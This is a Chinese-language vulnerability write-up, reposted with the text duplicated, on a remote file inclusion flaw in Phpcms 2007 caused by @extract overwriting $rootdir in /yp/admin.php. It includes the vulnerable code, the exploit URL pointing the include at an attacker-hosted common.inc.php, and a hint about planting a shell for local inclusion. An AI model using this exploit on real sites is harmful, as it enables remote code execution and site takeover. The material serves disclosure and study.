Phpcms 2007 远程文件包含漏洞
2008-08-23 09:44
344 查看
导读:
PS:@extract函数。
Phpcms 2007 远程文件包含漏洞
Flyh4t [w.s.t]
www.wolvez.org
该cms的核心配置文件/include/common.inc.php有缺陷
--------------------------------------------
//23行开始
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
------------------------------------------------
这里extract函数会导致变量覆盖,可能引发一系列的问题
我们看/yp/admin.php,这个文件名字是挺吓人的,还带admin。但是注册个企业用户就可以访问该页面了,我们看部分代码
------------------------------------------------
//从头开始看
$rootdir = str_replace("\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';//通过extract可以覆盖$rootdir为任意值
require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';
if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);
require $rootdir.'/web/admin/include/common.inc.php ';//触发远程文件包含
------------------------------------------------
利用的方式可以先在你的网站 site.com上放置/web/admin/include/common.inc.php这样的目录和文件,当然common.inc.php就是你的恶意代码,然后注册个用户访问网站并提交
http://target.com/yp/admin.php?Rootdir=http://site.com/即可。
最后多说一句,php5默认不开启远程文件功能,如果想包含本地文件又要被gpc限制,所以看上去这个漏洞挺鸡肋的。不过qiuren同学提供了一个不错的方法,可以旁注一个shell写/web/admin/include/common.inc.php到/temp目录然后包含之
PS:@extract函数。
Phpcms 2007 远程文件包含漏洞
Flyh4t [w.s.t]
www.wolvez.org
该cms的核心配置文件/include/common.inc.php有缺陷
--------------------------------------------
//23行开始
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
------------------------------------------------
这里extract函数会导致变量覆盖,可能引发一系列的问题
我们看/yp/admin.php,这个文件名字是挺吓人的,还带admin。但是注册个企业用户就可以访问该页面了,我们看部分代码
------------------------------------------------
//从头开始看
$rootdir = str_replace("\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';//通过extract可以覆盖$rootdir为任意值
require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';
if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);
require $rootdir.'/web/admin/include/common.inc.php ';//触发远程文件包含
------------------------------------------------
利用的方式可以先在你的网站 site.com上放置/web/admin/include/common.inc.php这样的目录和文件,当然common.inc.php就是你的恶意代码,然后注册个用户访问网站并提交
http://target.com/yp/admin.php?Rootdir=http://site.com/即可。
最后多说一句,php5默认不开启远程文件功能,如果想包含本地文件又要被gpc限制,所以看上去这个漏洞挺鸡肋的。不过qiuren同学提供了一个不错的方法,可以旁注一个shell写/web/admin/include/common.inc.php到/temp目录然后包含之
相关文章推荐
- Phpcms 2007 远程文件包含漏洞
- Phpcms 2007 远程文件包含漏洞
- 远程文件包含漏洞测试
- WordPress ‘WP ecommerce Shop Styling’插件“dompdf” 远程文件包含漏洞
- 远程文件包含漏洞的利用
- phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞
- Wordpress Gallery插件'load'参数远程文件包含漏洞
- 远程文件包含漏洞的利用
- PHP 网络开发详解之远程文件包含漏洞
- 文件包含漏洞之本地包含和远程包含
- phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞
- PHP 网络开发详解之远程文件包含漏洞
- 远程文件包含漏洞的利用
- php 远程包含文件漏洞分析第1/6页
- php远程文件包含漏洞
- PHP漏洞挖掘之旅——远程文件包含漏洞
- 详解远程文件包含漏洞
- 探讨PHP远程文件包含漏洞产生原因
- WordPress Browser Rejector 插件"wppath"远程文件包含漏洞
- dvwa文件包含漏洞和远程文件利用漏洞